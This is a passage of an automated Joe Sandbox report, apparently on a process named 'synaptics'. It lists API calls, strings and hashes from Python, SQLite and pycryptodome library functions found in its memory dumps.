                                                                                                                                                                                                              • SetSecurityDescriptorControl does not exist on this platform, xrefs: 6BF472C1
                                                                                                                                                                                                              • SetSecurityDescriptorControl, xrefs: 6BF4730F
                                                                                                                                                                                                              • ll:SetSecurityDescriptorControl, xrefs: 6BF472E0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Arg_ControlDescriptorErr_Error@@ParseSecurityStringTupleU_object@@Win_
                                                                                                                                                                                                              • String ID: SetSecurityDescriptorControl$SetSecurityDescriptorControl does not exist on this platform$ll:SetSecurityDescriptorControl
                                                                                                                                                                                                              • API String ID: 1472735374-853495732
                                                                                                                                                                                                              • Opcode ID: 7715d6c11512dbf744c040a41eb4992e932621db13762132b57a7f8afa96d026
                                                                                                                                                                                                              • Instruction ID: 2a2be86f165ebd7131bf2f6bbc4d6f568ac88c4697d4f77f12f5fcb287ad885b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7715d6c11512dbf744c040a41eb4992e932621db13762132b57a7f8afa96d026
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3A016936924101AFDF05EF68DC45E597BE8EB65306F8404A8F94482636E33AD67CCB72
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _PyArg_ParseTuple_SizeT.PYTHON310(?,i:GetSubAuthority), ref: 6BF479BE
                                                                                                                                                                                                              • GetSidSubAuthorityCount.ADVAPI32(?), ref: 6BF479D6
                                                                                                                                                                                                              • GetSidSubAuthority.ADVAPI32(?,?), ref: 6BF479E9
                                                                                                                                                                                                              • PyLong_FromLong.PYTHON310(00000000), ref: 6BF479F1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Authority$Arg_CountFromLongLong_ParseSizeTuple_
                                                                                                                                                                                                              • String ID: The index is out of range$i:GetSubAuthority
                                                                                                                                                                                                              • API String ID: 879078787-2602025648
                                                                                                                                                                                                              • Opcode ID: ddac8110f002b6487904ff926be7063b56f0715a071ab4c3c69ee858063d21d6
                                                                                                                                                                                                              • Instruction ID: ebc0a5c28c8dfdc0d1708a49028320eed53c88f668b2abcd6c46a4e7e1c47147
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ddac8110f002b6487904ff926be7063b56f0715a071ab4c3c69ee858063d21d6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 03F09073124010AFDB09EB68DC08D9A3FE8EF16306B1400A5F946C2536EB25D938DB62
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyType_IsSubtype.PYTHON310(?,6C0B56F8), ref: 6C0AAE47
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,invalid type), ref: 6C0AAE60
                                                                                                                                                                                                              • PySys_Audit.PYTHON310(ctypes.addressof,(O),?), ref: 6C0AAE79
                                                                                                                                                                                                              • PyLong_FromVoidPtr.PYTHON310(?), ref: 6C0AAE89
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AuditErr_FromLong_StringSubtypeSys_Type_Void
                                                                                                                                                                                                              • String ID: (O)$ctypes.addressof$invalid type
                                                                                                                                                                                                              • API String ID: 897305903-3457326693
                                                                                                                                                                                                              • Opcode ID: 2fc4d368f2a5440bfe934ff2c0a25df2dbc0590fdfffe7667c6fa9bec4cbb035
                                                                                                                                                                                                              • Instruction ID: d4c5c8cfccd692066f8db6ca4623d4b685f7db6d16f6d3d5142abf92ea9a3cce
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2fc4d368f2a5440bfe934ff2c0a25df2dbc0590fdfffe7667c6fa9bec4cbb035
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EFF08270605200ABCA40D799ED08A8B3BE9DF0165E7044C70F90EE2912DB33D5618B99
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Dealloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3617616757-0
                                                                                                                                                                                                              • Opcode ID: 542341bce27108360ed1e47b00b56265fd0e626b0d4c51b4d5e6983ec37023dc
                                                                                                                                                                                                              • Instruction ID: b264074d048b279056534c25a2343d9a9e2e8674b44b86f052ce4b91b1b79e40
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 542341bce27108360ed1e47b00b56265fd0e626b0d4c51b4d5e6983ec37023dc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8E311AF4A04F118BE7109AEAAC0474773F8BF0533CF160728E5A687AD1E775E8058B61
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Dealloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3617616757-0
                                                                                                                                                                                                              • Opcode ID: fb8319a92364b71fc33f4714b5e838de1334781f4296f81025daa558fc63f1d3
                                                                                                                                                                                                              • Instruction ID: b0c1c343c73dab4dd24641fa980217e37e102d4beed0bc430b03eb1985c21735
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fb8319a92364b71fc33f4714b5e838de1334781f4296f81025daa558fc63f1d3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 87211EF5A04F014BEB109AEAA80474773E8BF0173CF160718D5A687ED1E775E8058A51
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • sqlite3_vfs_find.SQLITE3(00002750), ref: 6C110C8E
                                                                                                                                                                                                                • Part of subcall function 6C0C4500: sqlite3_initialize.SQLITE3 ref: 6C0C4503
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • unable to open database: %s, xrefs: 6C111334
                                                                                                                                                                                                              • attached databases must use the same text encoding as main database, xrefs: 6C1110C4
                                                                                                                                                                                                              • database is already attached, xrefs: 6C11106B
                                                                                                                                                                                                              • out of memory, xrefs: 6C11135E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3097566579.000000006C0C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6C0C0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097364508.000000006C0C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097763089.000000006C1C1000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097877844.000000006C1D7000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097988021.000000006C1DA000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0c0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: sqlite3_initializesqlite3_vfs_find
                                                                                                                                                                                                              • String ID: attached databases must use the same text encoding as main database$database is already attached$out of memory$unable to open database: %s
                                                                                                                                                                                                              • API String ID: 791175296-3870584754
                                                                                                                                                                                                              • Opcode ID: 9d2cef7e7f85594a04e28157fb2cbad464412b4606d4009a5ef22c8e96e47785
                                                                                                                                                                                                              • Instruction ID: a41e93a038f28ae2e22cf906b4530294ecd332f217cda58a51cfaa429c0b64ed
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9d2cef7e7f85594a04e28157fb2cbad464412b4606d4009a5ef22c8e96e47785
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DCC17F74A097818BD700CB25C48075AFBF1AF6632CF38866CE8554BE92D779E44ACB52
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(hs->curlen < BLOCK_SIZE,src/SHA1.c,0000010D), ref: 6C051E62
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,00000014), ref: 6C051E8D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3092314378.000000006C051000.00000020.00000001.01000000.00000028.sdmp, Offset: 6C050000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3092106316.000000006C050000.00000002.00000001.01000000.00000028.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3092520115.000000006C054000.00000002.00000001.01000000.00000028.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3092720561.000000006C055000.00000004.00000001.01000000.00000028.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3092992757.000000006C056000.00000002.00000001.01000000.00000028.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c050000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wassertmemcpy
                                                                                                                                                                                                              • String ID: hs->curlen < BLOCK_SIZE$src/SHA1.c
                                                                                                                                                                                                              • API String ID: 785382960-330188172
                                                                                                                                                                                                              • Opcode ID: df8f69924233293e0d6498203b9dc1ab866646fe0939ff06df86ebb8711189ad
                                                                                                                                                                                                              • Instruction ID: ec4c582023f089540efa2a5b8d05e3b8acbe2d866f33fbbaff81b2c6c51f1c0f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: df8f69924233293e0d6498203b9dc1ab866646fe0939ff06df86ebb8711189ad
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 81A17030A087858BD725CF28C6407AAB3E1FFD8308F44DA1DE99D57611EB70E5A4CB82
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(hs->curlen < BLOCK_SIZE,src/MD5.c,000000EF), ref: 6BF31E49
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,00000010), ref: 6BF31E77
                                                                                                                                                                                                              • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(hs->curlen < BLOCK_SIZE,src/MD5.c,000000EF), ref: 6BF31F0E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3079308505.000000006BF31000.00000020.00000001.01000000.00000037.sdmp, Offset: 6BF30000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079115779.000000006BF30000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079418715.000000006BF33000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079607016.000000006BF34000.00000004.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079797292.000000006BF35000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf30000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wassert$memcpy
                                                                                                                                                                                                              • String ID: hs->curlen < BLOCK_SIZE$src/MD5.c
                                                                                                                                                                                                              • API String ID: 4292997394-3464417081
                                                                                                                                                                                                              • Opcode ID: 91dfed6820c5117dc52bad01b2d259af0f51a74e378a71b1a722b71ad42c493e
                                                                                                                                                                                                              • Instruction ID: 9215094ac0ad711b60a553f381f1e79c74553325d999a5a8aac8ae1b015091f7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 91dfed6820c5117dc52bad01b2d259af0f51a74e378a71b1a722b71ad42c493e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 03919F729087A58BD325CF28C5417ABB3E1FFD8304F04DA5DE99957221EB35A588CBC2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(((Nk==4) && (Nr==10)) || ((Nk==6) && (Nr==12)) || ((Nk==8) && (Nr==14)),src/AESNI.c,00000067), ref: 6BFC28BA
                                                                                                                                                                                                              • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0((idx>=1) && (idx<=10),src/AESNI.c,00000041), ref: 6BFC2932
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • src/AESNI.c, xrefs: 6BFC2928
                                                                                                                                                                                                              • ((Nk==4) && (Nr==10)) || ((Nk==6) && (Nr==12)) || ((Nk==8) && (Nr==14)), xrefs: 6BFC28B5
                                                                                                                                                                                                              • src/AESNI.c, xrefs: 6BFC28B0
                                                                                                                                                                                                              • (idx>=1) && (idx<=10), xrefs: 6BFC292D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3084730871.000000006BFC1000.00000020.00000001.01000000.00000031.sdmp, Offset: 6BFC0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3084621815.000000006BFC0000.00000002.00000001.01000000.00000031.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3084925591.000000006BFC3000.00000002.00000001.01000000.00000031.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3085116642.000000006BFC4000.00000004.00000001.01000000.00000031.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3085224740.000000006BFC5000.00000002.00000001.01000000.00000031.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bfc0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wassert
                                                                                                                                                                                                              • String ID: ((Nk==4) && (Nr==10)) || ((Nk==6) && (Nr==12)) || ((Nk==8) && (Nr==14))$(idx>=1) && (idx<=10)$src/AESNI.c$src/AESNI.c
                                                                                                                                                                                                              • API String ID: 3234217646-722309440
                                                                                                                                                                                                              • Opcode ID: 856f6a661a184193cae6f0fe63318dfa23cfd6881f9453eb607e58197a6c64f2
                                                                                                                                                                                                              • Instruction ID: a1bd6f9ce8c36c91fb665cb183f470ebf66d58bb284e729add47cfaef5cb33b8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 856f6a661a184193cae6f0fe63318dfa23cfd6881f9453eb607e58197a6c64f2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3761C532948243DAF716AE3C9052147F3B5EFA7344F209B1AE948B2221E776F5C98653
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _PyObject_LookupAttrId.PYTHON310(?,6C0B6BA0,?,?,00000000,00000001,?,?,?,?,6C0AEA5F), ref: 6C0ADB08
                                                                                                                                                                                                              • PySequence_Fast.PYTHON310(?,_anonymous_ must be a sequence,?,?,?,?,?,?,?,6C0AEA5F), ref: 6C0ADB2A
                                                                                                                                                                                                              • PyErr_Format.PYTHON310(6C7EA434,'%U' is specified in _anonymous_ but not in _fields_,?,?,?,?,?,?,?,?,?,?,?,?,6C0AEA5F), ref: 6C0ADC07
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AttrErr_FastFormatLookupObject_Sequence_
                                                                                                                                                                                                              • String ID: '%U' is specified in _anonymous_ but not in _fields_$_anonymous_ must be a sequence$_l
                                                                                                                                                                                                              • API String ID: 2134487765-2639848220
                                                                                                                                                                                                              • Opcode ID: 1b0c0c3458e788530c31d1d230866e3c7a4bc2952371ca881d2ff97e21ba111d
                                                                                                                                                                                                              • Instruction ID: be5db69d53e5b38e404e8f796b9b5466104fe183f56d6d8bfd8314e7efc7cb69
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1b0c0c3458e788530c31d1d230866e3c7a4bc2952371ca881d2ff97e21ba111d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F941D5B5E14705ABCB008FE9DD41A9EB3F4FF41338F140368EC29A3681DB35A916DA95
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000010,00000010), ref: 6BF868A2
                                                                                                                                                                                                              • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000002), ref: 6BF868B6
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6BF868C3
                                                                                                                                                                                                                • Part of subcall function 6BF84A20: memcpy.VCRUNTIME140(00000000,?,?,?,?,766B1980,?,?,?,?,?,?,?,?,6BF82871,?), ref: 6BF84B02
                                                                                                                                                                                                              • _aligned_malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000040,?,?), ref: 6BF868F3
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF8690B
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6BF86911
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,?,?), ref: 6BF86995
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3082077383.000000006BF81000.00000020.00000001.01000000.00000034.sdmp, Offset: 6BF80000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3081877305.000000006BF80000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082332200.000000006BF87000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082540453.000000006BF88000.00000004.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082736553.000000006BF89000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf80000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free$callocmemcpy$_aligned_malloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3254395653-0
                                                                                                                                                                                                              • Opcode ID: d4836cdc2a412fad4ba73f944888f41d78abecd5cf90629ed1afcf046fcabc01
                                                                                                                                                                                                              • Instruction ID: 3e99795d51dc893035b96fa4cb0822aa70b22acda4185ab885f44b57afe5870e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d4836cdc2a412fad4ba73f944888f41d78abecd5cf90629ed1afcf046fcabc01
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DC41CFB2A143159BD7009F1CEC8179BB7A4EF84714F44487AF989DB321E739D9098BA2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __RTC_Initialize.LIBCMT ref: 6C0AEC5C
                                                                                                                                                                                                              • ___scrt_uninitialize_crt.LIBCMT ref: 6C0AEC76
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Initialize___scrt_uninitialize_crt
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2442719207-0
                                                                                                                                                                                                              • Opcode ID: 09c11c45a34683302fd56242801ccb34d95b5cab049688ee67f56c069a84b46e
                                                                                                                                                                                                              • Instruction ID: c961eb4f4a6a759b89e4c2c37d038de79fa1f91694d26f19186126ddc46de968
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 09c11c45a34683302fd56242801ccb34d95b5cab049688ee67f56c069a84b46e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AC41B272E01624AFDF118FD5C840BEE7AF9EB81768F114125E83467B42D73169278BD0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(1 & a,D:\a\pycryptodome\pycryptodome\src\mont.c,0000005B), ref: 6BF8439E
                                                                                                                                                                                                              • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0((x*a & 0xFFFFFFFFFFFFFFFFULL) == 1,D:\a\pycryptodome\pycryptodome\src\mont.c,00000061,00000000,?,?,?,00000002,00000000,00000000,?,00000000,?,?,?,00000002), ref: 6BF84477
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • 1 & a, xrefs: 6BF84399
                                                                                                                                                                                                              • (x*a & 0xFFFFFFFFFFFFFFFFULL) == 1, xrefs: 6BF84472
                                                                                                                                                                                                              • D:\a\pycryptodome\pycryptodome\src\mont.c, xrefs: 6BF84394
                                                                                                                                                                                                              • D:\a\pycryptodome\pycryptodome\src\mont.c, xrefs: 6BF8446D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3082077383.000000006BF81000.00000020.00000001.01000000.00000034.sdmp, Offset: 6BF80000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3081877305.000000006BF80000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082332200.000000006BF87000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082540453.000000006BF88000.00000004.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082736553.000000006BF89000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf80000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wassert
                                                                                                                                                                                                              • String ID: (x*a & 0xFFFFFFFFFFFFFFFFULL) == 1$1 & a$D:\a\pycryptodome\pycryptodome\src\mont.c$D:\a\pycryptodome\pycryptodome\src\mont.c
                                                                                                                                                                                                              • API String ID: 3234217646-1717661758
                                                                                                                                                                                                              • Opcode ID: 843ba39fa8db69ecfa18364445178bf5f87c4edb594346bbd4897874fb672490
                                                                                                                                                                                                              • Instruction ID: 59bf39bba5eac34aec1856737cddd097ac891dfcf7578004cc05018019db62ce
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 843ba39fa8db69ecfa18364445178bf5f87c4edb594346bbd4897874fb672490
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 35218E73B202193BE7345D3A8C85F7B796EDBC66A4F164538F808D3260DA2AEC0461F5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(t_words >= a_words,D:\a\pycryptodome\pycryptodome\src\multiply_32.c,0000003D,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BF85557
                                                                                                                                                                                                              • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(carry == 0,D:\a\pycryptodome\pycryptodome\src\multiply_32.c,0000007D,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BF85659
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • D:\a\pycryptodome\pycryptodome\src\multiply_32.c, xrefs: 6BF8554D
                                                                                                                                                                                                              • t_words >= a_words, xrefs: 6BF85552
                                                                                                                                                                                                              • carry == 0, xrefs: 6BF85654
                                                                                                                                                                                                              • D:\a\pycryptodome\pycryptodome\src\multiply_32.c, xrefs: 6BF8564F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3082077383.000000006BF81000.00000020.00000001.01000000.00000034.sdmp, Offset: 6BF80000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3081877305.000000006BF80000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082332200.000000006BF87000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082540453.000000006BF88000.00000004.00000001.01000000.00000034.sdmpDownload File
